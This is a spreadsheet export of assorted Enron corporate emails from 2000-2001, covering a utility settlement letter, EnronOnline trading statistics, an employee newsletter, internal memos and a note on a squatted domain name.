&gt; &lt;Lindseyhowdowning@dwt.com&gt;, "'Phil_x000D_
&gt; &gt;                                          Davies, WGSI Calgary'"_x000D_
&gt; &lt;PhilDavies@aec.ca&gt;,_x000D_
&gt; &gt;                                          "'jleslie@LUCE.com'"_x000D_
&gt; &lt;jleslie@LUCE.com&gt;, "'Jeff_x000D_
&gt; &gt;                                          Fawcett, Transwestern'"_x000D_
&gt; &lt;jfawcett@enron.com&gt;,_x000D_
&gt; &gt;                                          Michael Rochman_x000D_
&gt; &lt;rochmanm@spurr.org&gt;, "'Rick_x000D_
&gt; &gt;                                          Counihan, Greenmountain.com'"_x000D_
&gt; &gt;                                          &lt;counihan@greenmountain.com&gt;,_x000D_
&gt; "'Bayless,_x000D_
&gt; &gt;                                          David@Utility'"_x000D_
&gt; &lt;david.bayless@utility.com&gt;,_x000D_
&gt; &gt;                                          "'Dingwall, Brian@UEM'"_x000D_
&gt; &lt;bdingwall@unitedgas.com&gt;,_x000D_
&gt; &gt;                                          "'Elsesser, Evelyn@aelaw'"_x000D_
&gt; &lt;eke@aelaw.com&gt;,_x000D_
&gt; &gt;                                          "'Johnson, Pamela@REMAC'"_x000D_
&gt; &gt;                                          &lt;johnson_pamela@lacoe.edu&gt;,_x000D_
&gt; "'Jun,_x000D_
&gt; &gt;                                          Christine@aelaw'"_x000D_
&gt; &lt;chj@aelaw.com&gt;, "'Karp,_x000D_
&gt; &gt;                                          Joseph@Whitecase'"_x000D_
&gt; &lt;karpjos@sf.whitecase.com&gt;,_x000D_
&gt; &gt;                                          "'McCrea, Keith@CIG/CM'"_x000D_
&gt; &lt;kmccrea@sablaw.com&gt;,_x000D_
&gt; &gt;                                          "'Paul, Joe@Dynegy'"_x000D_
&gt; &lt;joe.paul@dynegy&gt;, "'Pocta,_x000D_
&gt; &gt;                                          Mark@ORA'" &lt;rmp@cpuc.ca.gov&gt;,_x000D_
&gt; "'Scott, Susan@TW'"_x000D_
&gt; &gt;                                          &lt;sscott3@enron.com&gt;, "'Worster,_x000D_
&gt; Gerard@TXU'"_x000D_
&gt; &gt;                                          &lt;gworster@txuenergy.com&gt;,_x000D_
&gt; "'kmills@CFBF.com'"_x000D_
&gt; &gt;                                          &lt;kmills@CFBF.com&gt;, "'Karp,_x000D_
&gt; Joseph@Whitecase'"_x000D_
&gt; &gt;                                          &lt;karpjos@sf.whitecase.com&gt;,_x000D_
&gt; "'Skaff, Andy@Dynegy'"_x000D_
&gt; &gt;                                          &lt;askaff@chrm.com&gt;_x000D_
&gt; &gt;                                          cc:_x000D_
&gt; &gt;                                          Subject:     RE: Proposed_x000D_
&gt; revisions to CSA Letter_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; I would like to see us try to re-insert words to the effect that if the_x000D_
&gt; &gt; Commission throws out the CSA after haranguing the parties to reach an_x000D_
&gt; &gt; agreement, it will seriously discourage future settlement efforts by_x000D_
&gt; &gt; parties. That is not a deal-breaker for me, just a suggestion. Otherwise_x000D_
&gt; &gt; the comments are fine._x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; -----Original Message-----_x000D_
&gt; &gt; From: MBD [mailto:MDay@GMSSR.com]_x000D_
&gt; &gt; Sent: Monday, December 11, 2000 10:43 AM_x000D_
&gt; &gt; To: 'Pocta, Robert M.'; 'Counihan, Rick'; 'Jeff.Dasovich@enron.com';_x000D_
&gt; &gt; 'John Burkholder'; 'Mike Alexander'; 'Craig Chancellor'; 'Colin_x000D_
&gt; &gt; Cushnie'; 'Jeff Dasovich'; MBD; 'Paul Amirault'; 'Doug Porter'; 'Tom_x000D_
&gt; &gt; Beach'; 'Amirault, Paul'; 'Craig Chancellor, Calpine'; 'How-Downing,_x000D_
&gt; &gt; Lindsey'; 'Phil Davies, WGSI Calgary'; 'jleslie@LUCE.com'; 'Jeff_x000D_
&gt; &gt; Fawcett, Transwestern'; 'Michael Rochman'; 'Rick Counihan,_x000D_
&gt; &gt; Greenmountain.com'; 'Bayless, David@Utility'; 'Dingwall, Brian@UEM';_x000D_
&gt; &gt; 'Elsesser, Evelyn@aelaw'; 'Johnson, Pamela@REMAC'; 'Jun,_x000D_
&gt; &gt; Christine@aelaw'; 'Karp, Joseph@Whitecase'; 'McCrea, Keith@CIG/CM';_x000D_
&gt; &gt; 'Paul, Joe@Dynegy'; 'Pocta, Mark@ORA'; 'Scott, Susan@TW'; 'Worster,_x000D_
&gt; &gt; Gerard@TXU'; 'kmills@CFBF.com'; 'Karp, Joseph@Whitecase'; 'Skaff,_x000D_
&gt; &gt; Andy@Dynegy'_x000D_
&gt; &gt; Subject: FW: Proposed revisions to CSA Letter_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; Here are some edits to our letter from socal.  I do not feel they_x000D_
diminsh_x000D_
&gt; &gt; the usefulness of the letter, and they moderate the tone a little, as_x000D_
you_x000D_
&gt; &gt; would expect.  They also eliminate the lengthy recitation of the_x000D_
&gt; procedural_x000D_
&gt; &gt;_x000D_
&gt; &gt; events at the end of the letter.  If this gets them on the letter, I say_x000D_
&gt; &gt; let's sign.  I will assume everyone who signed on last week stays on the_x000D_
&gt; &gt; letter unless I hear differently from you by 3 pm today.  I really_x000D_
&gt; &gt; appreciate the quick turnaround.  Mike Day_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; -----Original Message-----_x000D_
&gt; &gt; From: Wright, Gillian - TP1GXW [mailto:GWright@sempra.com]_x000D_
&gt; &gt; Sent: Monday, December 11, 2000 10:26 AM_x000D_
&gt; &gt; To: 'mday@gmssr.com'_x000D_
&gt; &gt; Subject: Proposed revisions to CSA Letter_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; Mike,_x000D_
&gt; &gt; Here are SoCal's proposed revisions to the CSA letter - I'll call in a_x000D_
&gt; &gt; minute.  The edits are pretty extensive, but all along the lines we_x000D_
&gt; &gt; discussed (ie changing the tone to a more positive one)._x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; Gillian_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; &lt;&lt;CSA Letter SCG.doc&gt;&gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; Gillian A. Wright_x000D_
&gt; &gt; Regulatory Case Manager_x000D_
&gt; &gt; Sempra Energy_x000D_
&gt; &gt; 555 W. Fifth St. GT14D6_x000D_
&gt; &gt; Los Angeles, CA 90013-1011_x000D_
&gt; &gt; (213) 244-3833_x000D_
&gt; &gt; (213) 244-8820 fax_x000D_
&gt; &gt; gwright@sempra.com_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt;_x000D_
&gt;</t>
  </si>
  <si>
    <t>Thu, 10 May 2001 14:33:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'david.botchlett@enron.com', 'frank.vickers@enron.com', 'rogers.herndon@enron.com', 'kevin.mcgowan@enron.com', 'edward.ondarza@enron.com', 'joe.gold@enron.com', 'dana.davis@enron.com', 'jonathan.whitehead@enron.com', 'tara.sweitzer@enron.com', 'nick.mooney@enron.com', 'stuart.staley@enron.com', 'l..nowlan@enron.com', 'group.enron@enron.com', 'doug.gilbert-smith@enron.com', 'jennifer.rosado@enron.com', 'john.wilson@enron.com', 'scott.neal@enron.com', 'wade.hicks@enron.com', 'a..price@enron.com', 'ami.thakkar@enron.com', 'debra.davidson@enron.com', 'jonathan.mckay@enron.com', 'carrie.southard@enron.com', 'steve.elliott@enron.com', 'simone.la@enron.com', 'matt.motsinger@enron.com', 'phillip.allen@enron.com', 'a..martin@enron.com', 'richard.lewis@enron.com', 's..shively@enron.com', 'mark.tawney@enron.com', 'jeffrey.gossett@enron.com', 'jennifer.denny@enron.com', 'bruce.garner@enron.com', 'david.gallagher@enron.com', 's..friedman@enron.com', 'torrey.moorer@enron.com', 'craig.story@enron.com', 'don.schroeder@enron.com', 'jim.fallon@enron.com', 'trey.hardy@enron.com', 'thor.lien@enron.com', 'fletcher.sturm@enron.com', 'john.arnold@enron.com', 'kevin.presto@enron.com'})</t>
  </si>
  <si>
    <t>EOL Average Deal Count as of 5-09-01</t>
  </si>
  <si>
    <t>_x000D_
Notes for this Week's Report:_x000D_
_x000D_
* UK Gas's Average EOL and Non-EOL deals per day have decreased since their peak of 96 EOL and 140 Non-EOL transactions in March. They ended April with an average of 81 EOL deals per day and are currently tracking at 63 transactions. Non-EOL is reporting at 61 deals per day in May. _x000D_
_x000D_
* UK Power's average deals per day finished April with 13 EOL deals per day and is now showing 13 daily transactions in May as well, down from March's 59 EOL deals. Non-EOL's average transactions have increased, however, ending April with 180 deals per day and currently tracking 231 deals in early May._x000D_
_x000D_
* NA Power finished April with a new high of 559 EOL deals per day and are already tracking at 540 daily trades in May, considerably higher than the 340 average EOL transactions in January.  Non-EOL average deal count has also shown a slight increase during the same period._x000D_
_x000D_
* Southwest Power's EOL transactions per day has continued to increase in 2001. On average, they ended January with 26 EOL trades and now show 72 daily transactions in early May. Non-EOL transactions have slightly increased during this same period, up from 68 in January to 77 in May._x000D_
_x000D_
* WTI Financial's total transactions per month has decreased since it's record high 5,021 deals in February, down to 3,106 deals in April and only 1,193 trades in early May activity. Non-EOL trading has remained steady through April, but shows a decrease so far in May with only 539 transactions. WTI Physical's EOL total monthly transactions has remained steady at around 50 trades a month in 2001._x000D_
_x000D_
* LPG deals per month via EOL ended March and April with under 200 total monthly trades, down from a January high of 454 transactions. They currently show a total of 71 EOL deals through the first 7 trading days in May, while Non-EOL totals are also tracking lower than previous activity._x000D_
_x000D_
* Non-EOL Broadband trading is showing growth in May, now averaging 8 transactions per day, up from 3 in January. While Non-EOL deals per day continue to reflect a steady increase, EOL trading has recorded only 1 transaction in early May._x000D_
_x000D_
_x000D_
---------------_x000D_
The following files contain a graphical view of the average deal count and volumes per month by Commodity for EOL and OTC transactions since the launch of EnronOnline. This information is for comparative analysis only.  Do not update links when opening these files.  _x000D_
_x000D_
_x000D_
AVERAGE DEAL COUNTS FOR COMMODITIES (excluding Global Products, which displays monthly totals)_x000D_
_x000D_
     _x000D_
_x000D_
If you have any questions regarding this breakout, please contact one of the following:_x000D_
_x000D_
Torrey Moorer x3-6218_x000D_
Matt Motsinger x3-5221_x000D_
Adam Johnson x5-4877</t>
  </si>
  <si>
    <t>Tue, 18 Jan 2000 04:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Network Engineering and Operations Organizational Chart</t>
  </si>
  <si>
    <t xml:space="preserve">Shirely, please print this out for Vice before the meeting._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Ravi._x000D_
----- Forwarded by Ravi Thuraisingham/Enron Communications on 01/18/00 02:00 _x000D_
PM -----_x000D_
_x000D_
	John Griebling_x000D_
	Sent by: Michol Boyd_x000D_
	01/18/00 01:41 PM_x000D_
		 _x000D_
		 To: EC Employees -- All_x000D_
		 cc: _x000D_
		 Subject: Network Engineering and Operations Organizational Chart_x000D_
_x000D_
The Network Engineering and Operations organization is taking shape.  The _x000D_
attached organization chart reflects my direct reports and the major _x000D_
disciplines within the engineering organization.  Please support this _x000D_
leadership team in executing our mission to support our current network as _x000D_
well as deploy the GFN infrastructure and support systems.  _x000D_
_x000D_
You will notice that there are many leadership openings in the organization, _x000D_
please direct any input regarding external candidates for these positions to _x000D_
Patty Pennington._x000D_
_x000D_
The Network Engineering Team is also attempting to recruit between 30 to 50 _x000D_
people (as dictated by budget availability) across the indicated disciplines _x000D_
by mid-year._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 5 Jul 2000 01:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'nieves.soto@enron.com'})</t>
  </si>
  <si>
    <t>Fortune</t>
  </si>
  <si>
    <t>Jeff:_x000D_
_x000D_
You had better pray that none of us at EECC get a questionnaire from Fortune._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
_x000D_
Nieves G. Soto</t>
  </si>
  <si>
    <t>Wed, 31 Jan 2001 04:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Julie,_x000D_
_x000D_
I am like the godfather.  I shall ask you to return the favor_x000D_
one day._x000D_
_x000D_
The address is:  steven.leppard@enron.com _x000D_
_x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Julie" &lt;julie@lacimagroup.com&gt; on 01/31/2001 11:53:05 AM_x000D_
Please respond to "Julie" &lt;julie@lacimagroup.com&gt;_x000D_
To: &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Re: Book order_x000D_
_x000D_
_x000D_
_x000D_
Thanks Vince!_x000D_
?_x000D_
Will champagne do?? If not, name your price._x000D_
?_x000D_
Do you have an email address for steve leppard?? I tried: _x000D_
steve.leppard@enron.com?which  bounced back._x000D_
?_x000D_
Thanks,_x000D_
julie_x000D_
?_x000D_
ps - guess i'll finally meet you at the end of the month?_x000D_
----- Original Message ----- _x000D_
From:  Vince.J.Kaminski@enron.com _x000D_
To: Julie  _x000D_
Cc: Vince.J.Kaminski@enron.com _x000D_
Sent: Wednesday, January 31, 2001 1:36  PM_x000D_
Subject: Re: Book order_x000D_
_x000D_
_x000D_
Julie,_x000D_
_x000D_
There are many employees in London? who  would be interested._x000D_
You can send? an inquiry to Steve  Leppard._x000D_
_x000D_
I had a presentation last night_x000D_
to GARP in Houston and did  a commercial for the book._x000D_
You should put me on  commission._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Julie" &lt;julie@lacimagroup.com&gt; on  01/31/2001 06:31:39 AM_x000D_
_x000D_
Please respond to "Julie" &lt;julie@lacimagroup.com&gt;_x000D_
_x000D_
To:??  &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
cc:_x000D_
Subject:?  Re: Book order_x000D_
_x000D_
_x000D_
_x000D_
Vince,_x000D_
_x000D_
I wasn't sure if I responded to  your email, so apologise either for my_x000D_
delayed response or repeating  myself._x000D_
_x000D_
Thanks for the 2nd order! I believe they have already  been? dispatched._x000D_
Yes, I believe we received payment; thank you very  much for? following up_x000D_
with Paul. Glad the book was a hit!_x000D_
_x000D_
On  another subject, are there any Enron employees in Europe who may  be_x000D_
interested in attending either the energy or the weather course? Or,  are_x000D_
the quants and risk management mostly handled out of  Houston?_x000D_
_x000D_
Thanks again, and I'll forward an invoice on to  Shirley._x000D_
_x000D_
Julie_x000D_
_x000D_
----- Original Message -----_x000D_
From:? Vince.J.Kaminski@enron.com_x000D_
To:  julie@lacima.co.uk_x000D_
Cc: Vince.J.Kaminski@enron.com_x000D_
Sent:  Friday, January 26, 2001 11:29? PM_x000D_
Subject: Book  order_x000D_
_x000D_
Julie,_x000D_
_x000D_
We received the shipment of 50 books.?  Thanks._x000D_
_x000D_
The book was an instant hit. We need 50 more?  books._x000D_
_x000D_
Vince_x000D_
_x000D_
P.S. I understand Paul sent you the check for  the? remaining  50%_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 04:55:34 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">The All-Employee Meeting will be held Tuesday, Oct. 23, at 10 a.m. Houston time at the Hyatt Regency Houston Imperial Ballroom.  _x000D_
_x000D_
As one of the enhanced security measures we have recently employed, we will be checking employee badges at the entrance to the ballroom.  All employees will be required to present a valid Enron badge with a photo.  If you do not currently have a photo on your badge, please go to the badge office on the third floor of the Enron Building and have your photo added to your badge.  We also suggest allowing a bit more time in getting to the Hyatt and we request your patience, as these security measures may create some backup at the entrance to the ballroom._x000D_
_x000D_
Accessing the Meeting via Streaming Audio/Video_x000D_
If you are a Houston-based employee and can't attend the meeting, or if you are located in London, Calgary, Toronto, Omaha, New York or Portland (ENA), you can access the live event at &lt;http://home.enron/employeemeeting&gt;.  Enron Europe employees will receive a follow-up message from their Public Relations team concerning online access to the meeting._x000D_
_x000D_
Video Teleconferencing_x000D_
The meeting will be made available by video teleconference to employees in Sao Paulo, Buenos Aires, Dubai, Rio de Janeiro, Bothell, Wash., Denver, San Ramon, Calif., and Chicago.  If your location would like to participate by video teleconference, please contact Yvonne Francois at (713) 345-8725._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 8 Mar 2001 03:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'barbara.hueter@enron.com', 'sue.nord@enron.com', 'margo.reyna@enron.com', 'stephen.burns@enron.com', 'eric.benson@enron.com', 'mona.petrochko@enron.com', 'jeff.dasovich@enron.com', 'marchris.robinson@enron.com', 'ricardo.charvel@enron.com', 'john.neslage@enron.com', 'susan.landwehr@enron.com', 'allison.navin@enron.com'})</t>
  </si>
  <si>
    <t>EBS Connected</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Lara Leibman/Enron Communications on 03/08/01 11:22 AM=_x000D_
=20_x000D_
-----_x000D_
_x000D_
=09EBS Marketing &amp; PR_x000D_
=0903/07/01 06:36 PM_x000D_
=09=09=20_x000D_
=09=09 To: All EBS Employees Worldwide_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: EBS Connected_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Market Close 3/7/01_x000D_
70.00     +1.13_x000D_
_x000D_
Bandwidth Intermediation_x000D_
(through 3/2/01)_x000D_
_x000D_
YTD Transactions        196 Counterparties             26=20_x000D_
=20_x000D_
LTD Transactions        408  Counterparties               51            =20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
March 7, 2001_x000D_
_x000D_
_x000D_
_x000D_
EBS AHEAD OF THE REST WITH PPCS_x000D_
The Enron Intelligent Network includes a first-of-its-kind Pooling Point=20_x000D_
Network (PPN)  that includes 25 pooling points in the United States, Europe=_x000D_
=20_x000D_
and Asia.  At least 10 more are scheduled to be completed in 2001. This=20_x000D_
unique pooling point infrastructure provides an interconnection of switchin=_x000D_
g=20_x000D_
platforms that enable the trading and monitoring of bandwidth, storage, and=_x000D_
=20_x000D_
other commodities. The Pooling Point Control System (PPCS) is EBS=01,=20_x000D_
proprietary software system that controls our pooling point infrastructure=_x000D_
=20_x000D_
and helps to ensure the success of our bandwidth trading platform.  Click=_x000D_
=20_x000D_
here to read more._x000D_
_x000D_
_x000D_
GOING QUACKERS IN LONDON_x000D_
On Tuesday, February 27, Enron House, London was awash with rubber ducks, a=_x000D_
s=20_x000D_
the star of the marketing campaign launching bandwidth trading in Europe sw=_x000D_
am=20_x000D_
into action.  With the headline, "Relax ... Real-time bandwidth trading has=_x000D_
=20_x000D_
surfaced," the "rubber duck" campaign is encouraging European buyers and=20_x000D_
sellers of bandwidth to transact using the EnronOnline platform.=20_x000D_
_x000D_
"The last three months have marked a turning point in the development of th=_x000D_
e=20_x000D_
European bandwidth market," said Marcello Romano, vice president, Bandwidth=_x000D_
=20_x000D_
Trading. "Participants are waking up to the value of firm service level=20_x000D_
agreements and the flexibility offered through bandwidth trading and risk=_x000D_
=20_x000D_
management solutions," he added ._x000D_
_x000D_
EBS trader, Betsy Bassis highlights the interest the campaign is generating=_x000D_
.=20_x000D_
"Customers are calling up and squeaking their ducks at me-they love it!"_x000D_
_x000D_
Click here to view the "rubber duck" advertisement, running in Capacity=20_x000D_
magazine at the end of April._x000D_
_x000D_
NEW LOOK FOR WEBSOURCE_x000D_
Go online and check out the latest version of wEBSource (Version 1.2).  The=_x000D_
=20_x000D_
revamped site includes enhancements to increase the site's functionality,=_x000D_
=20_x000D_
including IT work requests, online expense reports, and improved research=_x000D_
=20_x000D_
options.  The new site also features an "Ask the CEO" section where employe=_x000D_
es=20_x000D_
can submit questions to the Office of the Chairman. =20_x000D_
_x000D_
_x000D_
_x000D_
IN A GALAXY FAR, FAR AWAY_x000D_
Enron is the presenting sponsor of Star Wars: The Magic of Myth, at the=20_x000D_
Museum of Fine Arts, Houston (MFAH).  The exhibit runs from March 11, throu=_x000D_
gh=20_x000D_
June 24, 2001 and showcases the images and myths that inspired the making o=_x000D_
f=20_x000D_
the Star Wars Trilogy.  The exhibit offers a glimpse into the film making=_x000D_
=20_x000D_
process by displaying original story boards with production notes, full-siz=_x000D_
ed=20_x000D_
figures of androids C-3PO and R2-D2, and featured props including an 11-foo=_x000D_
t=20_x000D_
model of the sinister Imperial Star Destroyer. =20_x000D_
_x000D_
Enron employees are entitled to two free vouchers to the exhibit.  Click he=_x000D_
re=20_x000D_
to order your voucher.  You will be asked for your company and RC number, b=_x000D_
ut=20_x000D_
you will not be charged for the tickets.  The museum will also host two=20_x000D_
family days on Sunday, April 1 and Saturday, May 12.  Family days will=20_x000D_
include activities such as mask making, spaceship building and other creati=_x000D_
ve=20_x000D_
projects for kids. =20_x000D_
_x000D_
REV-IT-UP FOR KIDS_x000D_
On March 17, 2001 a group of EBS employees will be racing for charity.  EBS=_x000D_
'=20_x000D_
six person team (Jason Andrade, Darran Binns, Paul Racicot, Mike Ramsey,=20_x000D_
Tracy Ramsey and Eddie Sera) will be driving in the "Rev-It-Up for Kids" ra=_x000D_
ce=20_x000D_
at the Houston Children=01,s Festival.  The proceeds from the festival bene=_x000D_
fit=20_x000D_
Child Advocates, a nonprofit organization dedicated to ending the cycle of=_x000D_
=20_x000D_
child abuse. For more information on Child Advocates or the Houston Childre=_x000D_
n=01,_x000D_
s Festival click on the links._x000D_
_x000D_
EBS WELCOMES NEW EMPLOYEES_x000D_
Please welcome the following new employees to EBS:_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
LATEST ENRON NEWS_x000D_
_x000D_
February, 10, 2001_x000D_
Enron Opens Market in Data Storage_x000D_
_x000D_
_x000D_
February 27, 2001_x000D_
Service Providers Offer Remote Storage_x000D_
_x000D_
_x000D_
February 28, 2001_x000D_
Enron Sets Sights on Bandwidth Boom_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
PORTLAND EMPLOYEE MEETING_x000D_
The Portland employee meeting has been postponed.  Jeff Skilling will be in=_x000D_
=20_x000D_
the Northwest next week.  The meeting is being rescheduled to take advantag=_x000D_
e=20_x000D_
of his visit to the area.  Jeff will join Ken Rice and Kevin Hannon for an=_x000D_
=20_x000D_
informal meeting to discuss EBS strategy and objectives.  Further details=_x000D_
=20_x000D_
about the meeting will be provided soon.  In the meantime, if you wish to=_x000D_
=20_x000D_
submit questions for the meeting in advance, please send them via email or=_x000D_
=20_x000D_
interoffice mail to Jessica Nevin._x000D_
_x000D_
UPCOMING TRAINING_x000D_
_x000D_
Applied Corporate Finance_x000D_
Dates:        March 12-13, 2001 (2 Days)  =20_x000D_
Time:       8:00 a.m. - 5:00 p.m. (PST)_x000D_
Location:    Portland - RiverPlace_x000D_
Registration Link &gt;&gt; =20_x000D_
_x000D_
 We want your ideas and feedback on EBS Connected.  Tell us what you like a=_x000D_
nd=20_x000D_
dislike about the newsletter, and ideas for future stories.=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Mar 2001 02:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Boat</t>
  </si>
  <si>
    <t>What's the length of your boat?  Does it have a cover?_x000D_
_x000D_
D</t>
  </si>
  <si>
    <t>Tue, 9 Oct 2001 08:30:20 -0700 (PDT)</t>
  </si>
  <si>
    <t>Fw: RE: 2002 Corporate Allocations to EIM</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
 Jim Derrick_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Brown, Michael - COO London &lt;michael.r.brown@enron.com&gt;_x000D_
To: McMahon, Jeffrey &lt;Jeffrey.McMahon@ENRON.com&gt;; Causey, Richard &lt;Richard.Causey@ENRON.com&gt;; Whalley, Greg &lt;Greg.Whalley@ENRON.com&gt;_x000D_
CC: Castleman, Kent &lt;Kent.Castleman@ENRON.com&gt;; Bowen Jr., Raymond &lt;Raymond.Bowen@ENRON.com&gt;; Buy, Rick &lt;Rick.Buy@ENRON.com&gt;; Causey, Richard &lt;Richard.Causey@ENRON.com&gt;; Delainey, David &lt;David.W.Delainey@ENRON.com&gt;; Derrick Jr., James &lt;James.Derrick@ENRON.com&gt;; Dietrich, Janet &lt;Janet.Dietrich@ENRON.com&gt;; Fallon, Jim &lt;Jim.Fallon@ENRON.com&gt;; Fastow, Andrew &lt;Andrew.Fastow@ENRON.com&gt;; Frevert, Mark &lt;Mark.Frevert@ENRON.com&gt;; Glisan, Ben &lt;Ben.Glisan@ENRON.com&gt;; Haedicke, Mark E. &lt;Mark.Haedicke@ENRON.com&gt;; Horton, Stanley &lt;Stanley.Horton@ENRON.com&gt;; Hughes, James A. &lt;James.A.Hughes@ENRON.com&gt;; Kean, Steven J. &lt;steve.kean@enron.com&gt;; Kitchen, Louise &lt;Louise.Kitchen@ENRON.com&gt;; Koenig, Mark &lt;Mark.Koenig@ENRON.com&gt;; Lavorato, John &lt;John.J.Lavorato@ENRON.com&gt;; Lay, Kenneth &lt;Kenneth.Lay@ENRON.com&gt;; Mcconnell, Mike &lt;Mike.McConnell@ENRON.com&gt;; Shankman, Jeffrey A. &lt;Jeffrey.A.Shankman@ENRON.com&gt;; Sherriff, John &lt;john.sherriff@enron.com&gt;; Whalley, Greg &lt;Greg.Whalley@ENRON.com&gt;_x000D_
Sent: Tue Oct 09 02:59:26 2001_x000D_
Subject: RE: 2002 Corporate Allocations to EIM_x000D_
_x000D_
Thanks , Bruce and I are talking about an appropriate way forward to ensure, so far as Europe is concerned , that support for EIM is structured and charged for correctly ._x000D_
Michael_x000D_
_x000D_
	 -----Original Message-----_x000D_
	From: 	McMahon, Jeffrey  _x000D_
	Sent:	08 October 2001 21:28_x000D_
	To:	Causey, Richard; Whalley, Greg_x000D_
	Cc:	Castleman, Kent; Bowen Jr., Raymond; Brown, Michael - COO London; Buy, Rick; Causey, Richard; Delainey, David; Derrick Jr., James; Dietrich, Janet; Fallon, Jim; Fastow, Andrew; Frevert, Mark; Glisan, Ben; Haedicke, Mark E.; Horton, Stanley; Hughes, James A.; Kean, Steven J.; Kitchen, Louise; Koenig, Mark; Lavorato, John; Lay, Kenneth; Mcconnell, Mike; McMahon, Jeffrey; Shankman, Jeffrey A.; Sherriff, John; Whalley, Greg_x000D_
	Subject:	2002 Corporate Allocations to EIM_x000D_
_x000D_
_x000D_
	Attached please find the corporate allocations for the 2002 fiscal year that EIM will accept.  After unsuccessfully attempting to get some justification for the PROPOSED allocations from many of the various corporate groups, we have had to make a determination ourselves as to what we believe are reasonable charges for the value received from these groups.  This determination was based on several factors including, 2001 actual allocations, expected services provided to EIM, redundant services provided by other groups that are also performed at EIM, etc._x000D_
_x000D_
	The attached charges are acceptable to EIM and will be used in the budget presentation to the office of the chair unless the allocating groups can come to an agreement with Kent Castleman of EIM as to a revision of these charges before such meeting._x000D_
_x000D_
	 &lt;&lt; File: Allocations to EIM 2002 Plan v2.xls &gt;&gt; _x000D_
_x000D_
	Jeffrey McMahon and Ray Bowen_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>frozenset({'paul.goddard@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'sbrown@velaw.com'})</t>
  </si>
  <si>
    <t>Re: Relevant Facts: EnronMetals.com</t>
  </si>
  <si>
    <t xml:space="preserve">Scott - I have a few more relevant facts for you: _x000D_
_x000D_
1. Peter Quine's letterhead (re: letter received by V&amp;E 11 Aug 2000) shows an _x000D_
apparent company name of 'e-nvironmental trading'.  Yet, interestingly, the _x000D_
squatted enronmetals.com website has references per Fig. 1 below to:_x000D_
_x000D_
 - 'WE ARE ENVIRONMETALS' - appears upon mouse-over of the faux logo ' _x000D_
ENviRONMEnTALS.COM'_x000D_
 - 'Manufactured Metal Miscellany' _x000D_
_x000D_
If Mr. Quine were acting in good faith, I believe he should have a good _x000D_
explanation for the what the connection might be between 'environmentals _x000D_
trading' and 'manufactured metals miscellany'.   Is he concerned with _x000D_
environmentals or environmetals ?  (Please See Figure 3 and comments below to _x000D_
see the rather dubious connection between the two.)_x000D_
_x000D_
Fig. 1 - www.enronmetals.com - homepage_x000D_
_x000D_
_x000D_
_x000D_
Figure 2 - 'Contact Us' page_x000D_
_x000D_
- This is misleading/misrepresentative since users would be led to believe _x000D_
that they may be contacting Enron Metals (vs. e-nvironmental trading) when _x000D_
they are invited to send email to :   'anyquestions@enronmetals.com'_x000D_
_x000D_
_x000D_
Figure 3 - 'About Us' page_x000D_
_x000D_
- contains text: _x000D_
'We are a Brighton based group whose aim is to bring together_x000D_
makers-suppliers-collectors_x000D_
of environmentally-friendly_x000D_
metals objets'_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
In addition, I checked on the register.com site and found that the website:  _x000D_
www.environmetals.com  has NOT been registered to anyone and is still _x000D_
available for purchase.  I would argue that if Peter Quine were acting in _x000D_
good faith, he would have already purchased this name ._x000D_
_x000D_
